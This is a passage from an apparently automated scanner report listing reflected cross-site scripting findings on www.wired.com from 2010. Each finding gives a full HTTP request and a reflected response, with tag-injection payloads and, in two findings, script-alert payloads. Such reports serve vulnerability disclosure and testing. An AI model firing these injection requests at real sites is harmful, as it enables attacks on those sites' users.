This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimediad71fa"><a>b579a399708/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:33 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimediad71fa"><a>b579a399708">
...[SNIP]...

1.505. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8377"><script>alert(1)</script>a852d762798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41077


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.506. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc57e"><a>6479810cedb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturefc57e"><a>6479810cedb/art/multimedia/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturefc57e"><a>6479810cedb ss_art c_multimedia">
...[SNIP]...

1.507. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287df"><a>b9badeee24d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art287df"><a>b9badeee24d/multimedia/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art287df"><a>b9badeee24d c_multimedia">
...[SNIP]...

1.508. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5771a"><a>9832fc9791e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia5771a"><a>9832fc9791e/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia5771a"><a>9832fc9791e">
...[SNIP]...

1.509. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54b5"><script>alert(1)</script>ea506289b5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.510. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1308"><a>62b113b6ddc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec1308"><a>62b113b6ddc/art/news/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:15 GMT
Date: Sun, 21 Nov 2010 23:07:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec1308"><a>62b113b6ddc ss_art c_news">
...[SNIP]...

1.511. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b07"><a>51bc0c4125e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art33b07"><a>51bc0c4125e/news/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:37 GMT
Date: Sun, 21 Nov 2010 23:07:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art33b07"><a>51bc0c4125e c_news">
...[SNIP]...

1.512. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ea3"><a>733ee83aeca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/newsb8ea3"><a>733ee83aeca/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:49 GMT
Date: Sun, 21 Nov 2010 23:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_newsb8ea3"><a>733ee83aeca">
...[SNIP]...

1.513. http://www.wired.com/culture/culturereviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/culturereviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b187a"><a>710ea181819 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureb187a"><a>710ea181819/culturereviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29273
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Sun, 21 Nov 2010 23:09:50 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureb187a"><a>710ea181819 ss_culturereviews">
...[SNIP]...

1.514. http://www.wired.com/culture/culturereviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/culturereviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c101a"><a>c9bdd73e8c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/culturereviewsc101a"><a>c9bdd73e8c4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29273
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:27 GMT
Date: Sun, 21 Nov 2010 23:06:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_culturereviewsc101a"><a>c9bdd73e8c4">
...[SNIP]...

1.515. http://www.wired.com/culture/design [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3632"><a>7fc96fc4812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee3632"><a>7fc96fc4812/design HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29257
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:03 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee3632"><a>7fc96fc4812 ss_design">
...[SNIP]...

1.516. http://www.wired.com/culture/design [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4088a"><a>cab77e397f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/design4088a"><a>cab77e397f3 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29257
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:29 GMT
Date: Sun, 21 Nov 2010 23:06:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_design4088a"><a>cab77e397f3">
...[SNIP]...

1.517. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f5"><a>35b68f7c68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureda2f5"><a>35b68f7c68f/design/multimedia/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureda2f5"><a>35b68f7c68f ss_design c_multimedia">
...[SNIP]...

1.518. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4136"><a>4e71b2b298e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/designe4136"><a>4e71b2b298e/multimedia/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:19 GMT
Date: Sun, 21 Nov 2010 23:07:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_designe4136"><a>4e71b2b298e c_multimedia">
...[SNIP]...

1.519. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1447"><a>17257c56c9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/design/multimediae1447"><a>17257c56c9f/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
